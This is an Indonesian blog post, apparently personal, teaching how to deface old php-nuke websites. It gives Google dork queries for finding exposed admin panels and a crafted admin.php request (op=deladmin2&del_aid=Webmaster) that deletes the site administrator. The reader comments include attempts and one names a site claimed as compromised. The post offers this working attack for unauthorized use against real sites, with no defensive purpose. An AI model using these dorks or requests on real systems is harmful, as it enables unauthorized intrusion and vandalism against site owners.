Belajar deface php-nuke ver lama

Deface kalau nggak salah tuh berarti merubah tampilan halaman web atau website.

saat itu ada seseorang yang ngajarin dan sampai sekarang orang itu tidak bakalan saia lupakan.šŸ™‚
nicknya FooPunk dan saat itu langsung praktek hehe.. asikna di ajarin……

sebenarnya saia bukan apa-apa, saya cuma seorang yang suka dengan chatting dan intinya ngak terlalu ngerti dengan yang namanya komputer, dan komputer aja belum adašŸ™‚

untuk dapatin target untuk deface, saat itu dengan memasukkan kata di google seartch :

“html/php-nuke/admin.php” atau “intitle:Administration Menu”

dulu sih banyak banget, saat itu saia kelas 3 SMK, dan sekarang udah jarang, atau mungkin nggak ada.

target di bawah ini, adalah bekas bekas dari SMK dulu. sekitar kurang lebih udah 3 tahun.

gambar di bawah ini adalah tampilan awal dari panel admin dengan url:
http://www.target.com/html/admin.php
Belajar deface php-nuke verĀ lama

adapun bug dari php-nuke ini :

cara menggunakannya :

untuk menghapus user admin :
admin.php?op=deladmin2&del_aid=Webmaster

Webmaster adalah user Admin

untuk menghapusnya tinggal tambahkan baris ?op=deladmin2&del_aid=Webmaster
nanti Webmaster akan langsung di hapus dari list admin php-nuke

sehingga akan menjadi :

http://www.target.com/html/admin.php?op=deladmin2&del_aid=Webmaster

di bawah ini adalah gambar tampilan panel admin php-nuke, nggak tau sih apaan tuch bahasanya.

Belajar deface php-nuke ver lamaĀ 2

dan di bawah ini adalah panel configure

Belajar deface php-nuke ver lamaĀ 3

6 Responses to “Belajar deface php-nuke ver lama”

  1. manteb bro ane berhasil

  2. ko gw ga bisa seh???

  3. gw baru nih mas…
    gw coba kok gk bisa mas ?
    teach me plz…..

  4. Heheh udah lama Itu, jadi kemungkinan tuh adminnya udah mengganti dengan php-nuke yang terbaru.

    mending coba testnya pake bug lain ajašŸ™‚

    Selamat belajaršŸ™‚

  5. thankz ya mas

    uda dapat 1 http://www.terrano.or.id/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: